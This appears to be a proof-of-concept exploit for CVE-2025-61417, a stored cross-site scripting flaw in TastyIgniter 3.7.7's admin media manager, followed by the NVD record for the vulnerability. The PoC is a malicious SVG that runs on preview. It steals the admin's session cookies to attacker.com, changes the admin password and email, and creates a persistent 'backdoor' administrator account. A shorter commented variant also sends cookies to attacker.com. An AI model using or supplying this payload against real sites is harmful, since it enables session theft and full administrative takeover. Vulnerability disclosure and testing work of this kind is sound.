CVE-2025-61417

<!-- CVE-2025-61417 PoC: Malicious SVG file for Stored XSS via Media Manager --> <!-- Upload this file via /admin/media_manager to trigger XSS when admin previews it --> <?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="500" height="500" onload="executeXSS()"> <script type="text/javascript"> // <![CDATA[ function executeXSS() { // Step 1: Steal admin session cookies var cookies = document.cookie; // Step 2: Exfiltrate cookies to attacker's server var img = new Image(); img.src = "https://attacker.com/steal?cookie=" + encodeURIComponent(cookies); // Step 3: Change admin credentials via AJAX var xhr = new XMLHttpRequest(); xhr.open("POST", "/admin/account", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send("username=admin&[email protected]&password=Pwned123!"); // Step 4: Create a new admin account for persistence var xhr2 = new XMLHttpRequest(); xhr2.open("POST", "/admin/staffs", true); xhr2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr2.send("name=backdoor&[email protected]&password=Backdoor123!&role_id=1"); } // ]]> </script> <rect x="0" y="0" width="500" height="500" fill="white"/> <text x="50" y="250" font-size="20">Image Preview</text> </svg> <!-- Alternative simpler PoC using event handler --> <!-- <svg xmlns="http://www.w3.org/2000/svg" onload="document.location='https://attacker.com/steal?c='+document.cookie"> <rect width="100" height="100" fill="red"/> </svg> -->

{"cve": {"id": "CVE-2025-61417", "sourceIdentifier": "[email protected]", "published": "2025-10-20T15:15:33.700", "lastModified": "2025-11-12T17:32:00.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Scripting (XSS) vulnerability exists in TastyIgniter 3.7.7, affecting the /admin/media_manager component. Attackers can upload a malicious SVG file containing JavaScript code. When an administrator previews the file, the code executes in their browser context, allowing the attacker to perform unauthorized actions such as modifying the admin account credentials."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tastyigniter:tastyigniter:3.7.7:*:*:*:*:*:*:*", "matchCriteriaId": "09FA6DB8-4888-479C-AAE9-3C16E5306792"}]}]}], "references": [{"url": "https://github.com/mg7-x/CVEs/blob/main/CVE-2025-61417/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/tastyigniter/TastyIgniter", "source": "[email protected]", "tags": ["Product"]}]}}